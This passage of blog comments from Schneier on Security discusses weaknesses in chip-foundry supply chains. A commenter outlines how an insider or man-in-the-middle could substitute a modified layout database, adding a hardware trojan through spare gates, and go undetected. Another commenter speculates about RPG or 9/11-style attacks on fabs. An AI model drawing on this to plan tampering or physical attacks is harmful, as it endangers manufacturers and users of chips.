With regards the foundry / fab facility what is the actual procedure to ensure that the customer sent package is actually the package they sent?

That is what’s to stop me substituting my own “physical layout”? And how much does it cost to go from the data held in the design database to the “physical layout”?

The reason I ask is simple realy, if the design database access control is so poor there appears to be little stoping an enployee “checking out” a copy of the design, making some of the alterations you sugest and then sending their modifed version instead of the original.

Clive Robinson January 5, 2011 3:52 AM

@ RobertT,

“There are only 6 fabs in the world capable of producing volume designs at 40nm”

And from what you say about half of them are not realy geared up for mobile chip devices.

I was aware that the number of facilities was going down because the cost was rising (over 1Billion USD back some time ago) but that is to few eggs even if they are not in the same basket.

Which gives me an idea for Bruce’s next Movie plot contest…

Now the last time I visited a foundry (many years ago) I was not overly impressed by the security of the site and I’m guessing it is not much more these days (it was about what you would expect for a small light engineering company sited in an idustrial park).

Back when doing Disaster Recovery, ‘site security’ was one of the items on the check list and I remember being told a story about the design of certain nuclear facilities. One consideration that was raised was an RPG from a helicopter through the roof of the reactor building. And how the engineers quickly reasured the person that it had been taken account of in the design. However after the person had left apparently one engineer said “Luky he didn’t ask what an RPG would do to the waste storage facilities”….

So I wonder if somebody has asked “What if an RPG was fired into the foundry building” and we know from the IRA attack on the MI6 building in London it’s not difficult to do. Further what the consiquences would be if say three of those plants got a 9/11 style attack…

I do remember 16 years ago an earthquake in Kobe Japan put a big dent in the production of LCD pannels and memory chips for a while and supposedly (according to some) caused a mini recession…

RobertT January 5, 2011 4:21 AM

@Clive,
“With all the security features disabled what would it take to ‘make them suspect’?”

The checks only exist to catch some young engineer accessing things that they are not authorized to access. To be honest that’s it! This step is only done to limit the scope of a data breach from an inside job.

“With regards the foundry / fab facility what is the actual procedure to ensure that the customer sent package is actually the package they sent?”

Usually transfer is simply through an ftp drop. So the Fab sets up an ftp location which is password protected and the design company transfers the design to the specified location. As a result there is probably nothing stopping a MITM attack on the transfer of the database. In reality this MITM or database substitution would need to happen quickly because there are always plenty of telephone calls coordinating an important database transfer.

If you managed to make this substitution AND your modifications did not cause any execution errors, than they would most likely never be found, or even suspected!

There is one final check where the fab sends the design company the actual Mask making data, but this is almost never looked at, (and few people actually understand the extra data in this file). About the only time anyone ever accesses this mask data is if some functional error is suspected to be caused by whats called Optical Proximity Correction structures, or “Fill” metal. These are added by the Fab / Mask house and so are not in the design/layout database.

“And how much does it cost to go from the data held in the design database to the “physical layout”?”

In reality you would need to modify the already completed layout database because otherwise you would never get an exact match to the original automated layout. The most likely way to do this would be with a manual layout at the chip top level. So someone would add the extra routes to hook up the spare gates after everything else was done. The cost to make these changes is minimal say 2hrs work for a skilled layout person, but you better not make a mistake. The mask set themselves costs several $M for 40nm, but if you substituted the database than you wouldn’t need to pay this.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.